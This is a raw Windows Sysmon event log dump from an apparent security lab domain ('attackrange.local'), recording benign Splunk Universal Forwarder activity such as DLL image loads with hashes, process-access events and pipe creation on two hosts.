CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057346176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057346175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057346174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057346173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057346172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057346171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057346170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057346169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057346168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057346167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057346166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057346165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057346164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057346163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057346162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057346161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057346160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057346159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057346158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057346157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057346155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057346153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057346152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057346150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057346149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057346148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057346147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057346146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057346145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.408{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057346144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057346143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F97661809011EF29B750297C6DFAEFF6,SHA256=6D5F05DC26FFE71B5CDDBEE14AC38B471DB3F17BE3058424C0082C88013C9BC0falsetrue 734700x800000000000000057346141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057346139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057346138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057346137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.393{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057346135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.388{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057346134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:10.387{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:10.387{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:10.387{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:10.387{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:10.387{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:10.387{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x800000000000000021219771Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.597{AD5E2759-5B82-618E-13CE-08000000F101}33002884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219770Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.409{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B82-618E-13CE-08000000F101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219769Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.393{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 